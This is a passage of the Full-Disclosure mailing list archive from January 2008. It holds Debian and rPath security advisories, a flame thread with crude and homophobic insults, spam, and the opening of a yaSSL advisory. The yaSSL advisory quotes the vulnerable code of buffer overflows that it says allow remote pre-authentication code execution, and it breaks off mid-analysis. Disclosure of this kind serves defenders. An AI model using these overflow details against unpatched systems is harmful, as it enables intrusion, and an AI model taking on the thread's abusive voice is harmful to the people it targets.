  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum:   182512 fb73577165992566da0389f86e3a6b95

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:    22738 3ed0461c9e4140c74e2f85ed2a2b2b81
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:    22400 8fa6694347367e82b4e50e39d5733eed
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:   104940 3a7883ff5c784a856c186e77a80622d0
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:   588554 905f9bd3a1b126ffe39e905c7d8ce8c6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:    22406 3ac0c30337b8bdf65d0b21a000de20a5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:  8025338 1387b73dfa64200820240f3f9dae7f1d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:   182552 ee8499efd263c40237edeb8d93a569d6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum:    22390 8faf91bdeb2ec7423f07a725e50d1ad0

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:    22394 f5aa29e920753e3bcf0a0674318553d2
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:   104444 29bcac5ae36cac54a74694de8395c197
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:    22742 f8f77dc0c4f8a3bc67bf2214bcc46be9
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:    22408 e4e0350f57fd06adb2e2fbc89af42dd6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:  7406210 3919cfdcc8da4478c10f41b5401cbdf6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:   575888 21e0043941b17edbaa3cdc1e7111e057
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:   182532 399a017ea351749cd273e14e4bb90b4d
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum:    22402 4703a3efb299bd24f2efbddc903e75b4

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:   583540 d28ec863702730a3a0c751348713fb08
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:    22402 bbd1291dc8ec5c51bec315cfd76dabe6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:    22394 f0483cfdb2a6bd95e8279020e667a00b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:   182528 76431e0cd12897406aad8d7c7d228b1d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:  8605240 881a95185ccfd14962c4454e63a1e061
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:    22408 8eef1dd12f730770000167906dc13ba8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:    22742 5ba721ddf0c19fe68c1e7e9b2a42d617
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum:   104146 904f61784d5497b0e9c62c5f6212716b

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:   640934 a4c0a38b84f1743132fe97104e60e0f8
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:   115516 7e36d728f20872a20c97888ff71f2f8a
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:    22746 1d8ff68d170493a9f933efe99dc5de4b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:  9756462 ef44439e24ad9fce4eb83def19baf2fd
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:   182512 efe82f566fd8cb93813aebb12b661915
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:    22396 19cb8ffa456f85d4df01a9aa4afcb790
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:    22404 dae9cb6e19ed7f64ce9c91b0ea428950
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum:    22410 b8645896b1016a68bbd60f0074a5b8b2

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:    22410 c7f2f6fd47e7d99a23c416be856bf7e3
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:    22744 f4956c04dfaaf715f6d541f10c032603
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:   103478 506c9304b2ad26c5d4b0d87b5250a4d8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:    22396 dd3f26bc33cf50407c0a48d380210285
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:  8686584 4c989456f94e655e02eb60f89319efa2
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:   586394 ffa4683f4363e6b712cf4033bddb57fb
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:    22408 47b020875b4cbb7ca969acb5bd7e4476
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum:   182538 d9b164dc5a1cc864cd237fdb29bf46d3


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVQTXm3vHE4uyloRAkgHAJ4o8GikpPmWCrwPBC/XFc0zlRMDjgCg2pqm
mMVpOLVQzV/Z16OFLq4ehUI=
=fHZ0
-----END PGP SIGNATURE-----



From jmm at debian.org  Thu Jan  3 21:54:49 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:54:49 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1447-1] New tomcat5.5 packages
	fix several vulnerabilities
Message-ID: <20080103215449.GA12756@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1447-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 03, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tomcat5.5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3382 CVE-2007-3385 CVE-2007-3386 CVE-2007-5342 CVE-2007-5461

Several remote vulnerabilities have been discovered in the Tomcat
servlet and JSP engine. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2007-3382

    It was discovered that single quotes (') in cookies were treated
    as a delimiter, which could lead to an information leak.

CVE-2007-3385

    It was discovered that the character sequence \" in cookies was
    handled incorrectly, which could lead to an information leak.

CVE-2007-3386
 
    It was discovered that the host manager servlet performed
    insufficient input validation, which could lead to cross-site
    scripting.

CVE-2007-5342

    It was discovered that the JULI logging component did not restrict
    its target path, resulting in potential denial of service through
    file overwrites.

CVE-2007-5461

    It was discovered that the WebDAV servlet is vulnerable to absolute
    path traversal.

For the stable distribution (etch), these problems have been fixed in
version 5.5.20-2etch1.

The old stable distribution (sarge) doesn't contain tomcat5.5.

The unstable distribution (sid) will be fixed soon.

We recommend that you upgrade your tomcat5.5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20.orig.tar.gz
    Size/MD5 checksum:  4796377 5775bae8fac16a0e3a2c913c4768bb37
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.dsc
    Size/MD5 checksum:     1277 c2193e917dd759a50b8481177bfcef39
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.diff.gz
    Size/MD5 checksum:    28422 6df1691cbea55b10e2d2d865b4b2983a

Architecture independent packages:

  http://security.debian.org/pool/updates/main/t/tomcat5.5/libtomcat5.5-java_5.5.20-2etch1_all.deb
    Size/MD5 checksum:  2385530 5f6482d73f7507b5f2f050ea825ee800
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5-webapps_5.5.20-2etch1_all.deb
    Size/MD5 checksum:  1472296 4bc554684655794b1d82db2160d67bea
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1_all.deb
    Size/MD5 checksum:    56744 a1de64bb115d03c4d33c28065e0c793a
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5-admin_5.5.20-2etch1_all.deb
    Size/MD5 checksum:  1162332 ab90aab000037913260361eec812c573


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVlLXm3vHE4uyloRAu9YAKCr8kSTbngRMSr2psqJc8bj0dtacgCg4EKV
qrMdQPckD+pDH9gSb7REw6o=
=fatv
-----END PGP SIGNATURE-----



From reepex at gmail.com  Fri Jan  4 01:02:38 2008
From: reepex at gmail.com (reepex)
Date: Thu, 3 Jan 2008 19:02:38 -0600
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To: <477C5CA3.7020508@bellsouth.net>
References: <20080102164630.F3980118039@mailserver5.hushmail.com>
	<e9d9d4020801021541v5ceaf4eeta2ad882a12cd08bb@mail.gmail.com>
	<477C5CA3.7020508@bellsouth.net>
Message-ID: <e9d9d4020801031702g17597c06yb42e2c2b51e3f187@mail.gmail.com>

well I will miss all your fan mail from the past. maybe i will forward them
to the list one day for other's entertainment

On Jan 2, 2008 9:55 PM, scott <redhowlingwolves at bellsouth.net> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> An your earth-shattering views are *SO* important,you must make sure
> everyone hears you.I think you just like to see your own posts.
>
> I'm filtering your posts from now on as they are nothing but from a
> wanna-be trying to play kids games in a mans world.
>
> I shouldn't waste my time responding to a teeny- bopper,anyway.
>
> Scott
> reepex wrote:
> > So you included me in here because my name has something to do with farm
> > equipment? Did your message have a point?
> >
> > You wrote a bunch of nonsense flattering your favorite security stars
> and
> > then attempted to flame us with one liners that did not make sense.. It
> > seems you are caught in between the serious posters ( since you have no
> > skill, you cannot post anything useful), and the trolls ( because you
> are
> > not funny or convincing ).
> >
> > My version of full disclosure is calling out idiots with Cissps and
> Phds who
> > post here and think their XSS and earth shattering barragess of 0x41's
> makes
> > them security experts.
> >
> > On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:
> >
> >> Critical Vulnerability in [Full-Disclosure]
> >>
> >> The problem with full disclosure is that everyone feels the need to
> >> fully disclose, even when their opinion and the information they
> >> are purporting to impart is, well, bollocks. You can't tell them to
> >> shut up as they think they're important and the internet gives them
> >> balls of steel and verbal diarhoea, so we stumble from one tired
> >> flamewar to another with no useful content being published.
> >>
> >> It's embarrassing.
> >>
> >> I'm an advocate of FD as a concept. I believe that there is no such
> >> thing as an innocent on the internet and if you really are that
> >> dumb, then you deserve everything you get. FD (as one of many like-
> >> minded lists) forces the vendors to patch or die and eventually
> >> write quality code. FD (the concept, not the list) is the ultimate
> >> nuclear deterrent, without the mutually assured destruction lunacy.
> >>
> >> I have watched the posters to this list for some time. By far the
> >> vast majority are transparently kiddies, sitting on their painted-
> >> up laptops thinking of themselves as the techno-brats in the film
> >> "Hackers" and hoping to grow up to be like the guy in the film
> >> "Swordfish". They write in l33t5p34k and think that this somehow
> >> makes them informed. Kiddies are the lowest form of life in the
> >> hierarchy of information security and in the IT industry generally.
> >>
> >> You know who you are and so does everyone else. You are fools, and
> >> an embarrassment to the craft:
> >> Secreview (review of products/services you have never bought, are
> >> you the goatse.cz receiver?)
> >> Reepex (Isn't a reepex a bit of farm machinery?)
> >> Gobbles (A nickname for a gay male prostitute)
> >> Morning Wood (The holy grail of the viagra-abuser)
> >> Gmaggro ("high value target selection", are you completely cocking
> >> stupid?)
> >>
> >> Oh, the outrage.
> >>
> >> I can see it now. there will be armies of skiddies demanding that
> >> the l33tz hack this f at cker, spam him, pwn him, and post defamatory
> >> messages concerning her skills and possible employment
> >> opportunities for her and her mother everywhere possible. Guess
> >> what, kids? I don't care.
> >>
> >> No, not even a little bit. Do what you like, I could care less and
> >> no one else cares if you live or die tonight, you sad, acne'd
> >> little dewdrops.
> >>
> >> Calmed down yet?
> >>
> >> Good. I want you to consider something.
> >>
> >> The FD list consists of the following content (and what it has to
> >> say):
> >>
> >> Advisories by vendors (we fixed this)
> >> Advisories by individuals (I tested that and found this)
> >> Advisories by infosec organisations (we found this)
> >> Funnies (self explanatory)
> >> Opinions (this sucks, what about that?)
> >> Skids (I did this, aren't I great, everyone else sucks?)
> >> Trolls (you suck)
> >> Trawlers (I have something 0day to buy or sell)
> >>
> >> The top three (ie the useful content) is available in any one of a
> >> hundred places, the bottom three are noise. The only people
> >> interested in the noise are those who keep track of it for a
> >> living.
> >>
> >> So, consider that by posting anything in the bottom three
> >> categories, you are drawing the attention of those who take an
> >> interest in your sad efforts to destabilise the technical crutch of
> >> society. These people are better than you in every important way,
> >> and if you so much as tiptoe across one of their lines, you'll wind
> >> up sharing a cell with a 7ft gorilla called george with a dead
> >> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
> >> night and twice on sundays. Do yourselves a favour and STFU.
> >>
> >> What's left?
> >>
> >> The funnies and the opinions. I've laughed my tits off at posts by
> >> Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've
> >> been interested by a few others who will remain nameless as I can't
> >> list them all. Long live full disclosure, but keep in mind that
> >> you're only legends in your own bedrooms.
> >>
> >> later, pi
> >>
> >> --
> >> Click to get a free auto insurance quotes from top companies.
> >>
> >>
>
> http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> > ----------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> - --
> <b>redhowlingwolves</b>
> <br>Web:<a href=http://www.hacking-passion.com/>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFHfFyhxajqy/aNaRsRAnrxAJ9HdTwy+i8X6+L/9Ol5UkqmKpl1kwCeI9N2
> XqT/0tOM1wkEmvVrYlL+yCE=
> =fasY
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080103/b2e83cce/attachment.html 

From auto113496 at hushmail.com  Fri Jan  4 06:28:30 2008
From: auto113496 at hushmail.com (auto113496 at hushmail.com)
Date: Fri, 04 Jan 2008 01:28:30 -0500
Subject: [Full-disclosure] http://www.plannetgroup.com/home.html
Message-ID: <20080104062830.9351520038@mailserver7.hushmail.com>

Check this out...


--
Need cash? Click to get a cash advance.
http://tagline.hushmail.com/fc/Ioyw6h4dP5JA5M122hYuWOr3jac6oXWShCFBbNFC49vdQ6tjvJ0gAI/
http://www.plannetgroup.com/home.html



From announce-noreply at rpath.com  Thu Jan  3 18:33:39 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jan 2008 13:33:39 -0500
Subject: [Full-disclosure] rPSA-2008-0001-1 dovecot
Message-ID: <477d2a83.r5Kp7P7DBrgd7xA8%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0001-1
Published: 2008-01-03
Products:
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Remote User Non-deterministic Weakness
Updated Versions:
    dovecot=conary.rpath.com at rpl:1/1.0.10-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2076

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6598

Description:
    Previous versions of the dovecot package contain multiple
    vulnerabilities, the most serious of which might confuse
    LDAP-authenticated logins between different users with the
    same password.  Other vulnerabilities include Denials of
    Service which appear to be limited to the connecting user.

http://wiki.rpath.com/Advisories:rPSA-2008-0001

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From announce-noreply at rpath.com  Thu Jan  3 22:55:57 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jan 2008 17:55:57 -0500
Subject: [Full-disclosure] rPSA-2008-0004-1 tshark wireshark
Message-ID: <477d67fd.zYMwl8Rf5v9SNdJM%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0004-1
Published: 2008-01-03
Products:
    rPath Linux 1

Rating: Major
Exposure Level Classification:
    Indirect User Deterministic Denial of Service
Updated Versions:
    tshark=conary.rpath.com at rpl:1/0.99.7-0.1-1
    wireshark=conary.rpath.com at rpl:1/0.99.7-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1975

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6440
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6442
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6443
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6444
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6445
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6446
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6447
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6448
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6449
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451

Description:
    Previous versions of the wireshark package are vulnerable
    to multiple types of Denial of Service attacks, including
    crashes and excessive memory consumption.  It has not been
    determined that these vulnerabilities can be exploited to
    execute malicious code.

http://wiki.rpath.com/Advisories:rPSA-2008-0004

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From candyshop999 at gmail.com  Fri Jan  4 10:24:41 2008
From: candyshop999 at gmail.com (Super Star)
Date: Fri, 4 Jan 2008 12:24:41 +0200
Subject: [Full-disclosure] United Built Homes,
	Pro Step Marketing Partners with Top-Selling Atlantic Beach,
	NC Real Estate Team
Message-ID: <eb5142cf0801040224j57dd7f20if08d737c7bc03229@mail.gmail.com>

United Built Homes, Pro Step Marketing Partners with Top-Selling Atlantic
Beach, NC Real Estate Team

Huntersville, NC (PRWeb) February 19, 2007 -- Pro Step Marketing, a real
estate-focused marketing strategy, design and implementation firm, partnered
with The Star Team of Atlantic Beach, NC -- to implement a website and print
marketing strategy.

Pro Step Marketing developed a marketing strategy for The Star Team that
includes website development, Search Engine Optimization, stationery and a
logo. This strategy successfully integrates the team's existing brand that
accurately reflects the real estate team and its dedication to its clients.
A large part of the marketing strategy Pro Step Marketing created includes
an Atlantic Beach Real Estate <http://www.thestarteam.net/> website that
successfully integrates market-specific content, multiple search options for
homebuyers, and useful resources for buyers and sellers.

The Star Team of Smith & Weil Premier Properties provides years of knowledge
and experience in the costal region of North Carolina and will work hard for
you to find you the right property in the Atlantic Beach, N.C. area. The
Star Team assists homebuyers and sellers in the Beaufort, Harkers Island and
Morehead City real estate markets.

Pro Step Marketing, located in Huntersville, North Carolina, provides Real
Estate Web Design <http://www.prostepmarketing.com/> marketing consultation
and education services to real estate agents across the country, along with
logo design, branding services for print and web, website design and
development, including lead integration strategies and search engine
optimization. Pro Step Marketing has a team dedicated to putting all the
pieces together so their clients can finally get the results they've always
wanted from their real estate marketing strategies.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080104/8efe8b99/attachment.html 

From candyshop999 at gmail.com  Fri Jan  4 10:19:05 2008
From: candyshop999 at gmail.com (Super Star)
Date: Fri, 4 Jan 2008 12:19:05 +0200
Subject: [Full-disclosure] Martin Pelmore, Finish out the Year with a
	Rejuvenating Getaway to Fort Lauderdale;
	Harbor Beach Marriott Resort & Spa Offers Holiday Resort Credit
Message-ID: <eb5142cf0801040219i2fe6f1acncf37f84eb29f804e@mail.gmail.com>

Martin Pelmore, Finish out the Year with a Rejuvenating Getaway to Fort
Lauderdale; Harbor Beach Marriott Resort & Spa Offers Holiday Resort Credit


Fort Lauderdale, FL (PRWEB) September 16, 2007 -- Celebrate the holidays
seaside in Fort Lauderdale with Harbor Beach Marriott Resort and Spa's
Holiday Resort Credit Package. Steal away and take advantage of rates from
$249-$319.

 Available November 16 through December 26, the package includes a deluxe
guest room and a $150 Resort Credit for a three-night stay or $300 Resort
Credit for a five-night stay.

 Create a customized inclusive stay when booking the south Florida vacation
package. Curl up in a shaded beach cabinette and watch the surf on our
quarter-mile stretch of private beach, spend a day in the spa restoring your
spirits or shop at four of the resort's unique boutiques, or indulge in a
variety of restaurant fare.

 Guests can also take advantage of the underwater world: with a fully
equipped dive shop and certified dive instructor on the property, the resort
boasts two reefs and four dive sites. In a city recognized as one of the
world's top diving locales, the beaches here are ideal for observing flat
reef crustaceans, offshore marine life and sea turtles, and simply perusing
around for seashells.

 For more information on the Resort Credit Package, visit

 About the Harbor Beach Marriott Resort & Spa

Harbor Beach Marriott Resort & Spa is a premier Fort Lauderdale beach hotel
featuring 637 guest rooms, including 35 luxurious suites, all of which
include two-lined telephones with message service, data ports, high-speed
Internet access, a 32" cable TV with PlayStation capability, deluxe bedding,
in-room safe, individual climate control, mini-bar and more. The Spa at
Harbor Beach, is listed in "100 Best Spas of the World," and is an $8
million seaside oasis boasting 18 private treatment rooms, a private spa
pool, sauna, whirlpool, eucalyptus steam rooms, private lockers,
health-oriented Spa Caf?, fitness center, yoga and Pilates classes and
motion studio overlooking the ocean. Harbor Beach guests enjoy playing
privileges at a selection of Fort Lauderdale private golf courses. A variety
of dining options await you, including 3030 Ocean, one of the best fine
dining waterfront restaurants in Fort Lauderdale offering modern American
seafood under the helm of famed executive chef Dean James Max. The resort
also offers 30,000 sq. ft. of flexible indoor meeting space, 22,500 sq. ft.
of outdoor oceanfront terraces and 200,000 sq. ft. of sparkling beach for
signature events. For more information, call (954) 766-6133 or visit
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080104/8dadeffb/attachment.html 

From aluigi at autistici.org  Fri Jan  4 17:53:32 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 4 Jan 2008 18:53:32 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in yaSSL 1.7.5
Message-ID: <20080104185332.e8d46100.aluigi@autistici.org>


#######################################################################

                             Luigi Auriemma

Application:  yaSSL
              http://www.yassl.com
Versions:     <= 1.7.5
Platforms:    Windows and *nix
Bugs:         A] buffer-overflow in ProcessOldClientHello
              B] buffer-overflow in "input_buffer& operator>>"
              C] invalid memory access in HASHwithTransform::Update
Exploitation: remote
Date:         04 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


yaSSL is an open source SSL library mainly used in MySQL and in other
projects.
On MySQL, if SSL support is enabled, is possible to use this
vulnerability for pre-authentication code execution.


#######################################################################

=======
2) Bugs
=======

-------------------------------------------
A] buffer-overflow in ProcessOldClientHello
-------------------------------------------

The buffer which contains the data received by the client in the Hello
packet has the following structure (from yassl_imp.hpp):

class ClientHello : public HandShakeBase {
    ProtocolVersion     client_version_;
    Random              random_;
    uint8               id_len_;                         // session id length
    opaque              session_id_[ID_LEN];
    uint16              suite_len_;                      // cipher suite length
    opaque              cipher_suites_[MAX_SUITE_SZ];
    uint8               comp_len_;                       // compression length
    CompressionMethod   compression_methods_;
    ...

where ID_LEN is 32 elements long, MAX_SUITE_SZ 64 and RAN_LEN (Random)
is 32.
The ProcessOldClientHello function called when an old version of the
Hello packet is received doesn't have the needed checks for limiting
the amount of data which will fill these 3 fields leading to a
buffer-overflow vulnerability exploitable for executing code remotely.

>From handshake.cpp:

void ProcessOldClientHello(input_buffer& input, SSL& ssl)
    ...
    ClientHello ch;
    ...
    for (uint16 i = 0; i < ch.suite_len_; i += 3) {    
        byte first = input[AUTO];
        if (first)  // sslv2 type
            input.read(len, SUITE_LEN); // skip
        else {
            input.read(&ch.cipher_suites_[j], SUITE_LEN);
            j += SUITE_LEN;
        }
    }
    ch.suite_len_ = j;

    if (ch.id_len_)
        input.read(ch.session_id_, ch.id_len_);

    if (randomLen < RAN_LEN)
        memset(ch.random_, 0, RAN_LEN - randomLen);
    input.read(&ch.random_[RAN_LEN - randomLen], randomLen);
    ...


------------------------------------------------
B] buffer-overflow in "input_buffer& operator>>"
------------------------------------------------

Another buffer-overflow is located in the function used for handling
the normal Hello packet but in this case doesn't seem possible (or
easily possible) to exploit this vulnerability for executing code.

>From yassl_imp.cpp:

input_buffer& operator>>(input_buffer& input, ClientHello& hello)
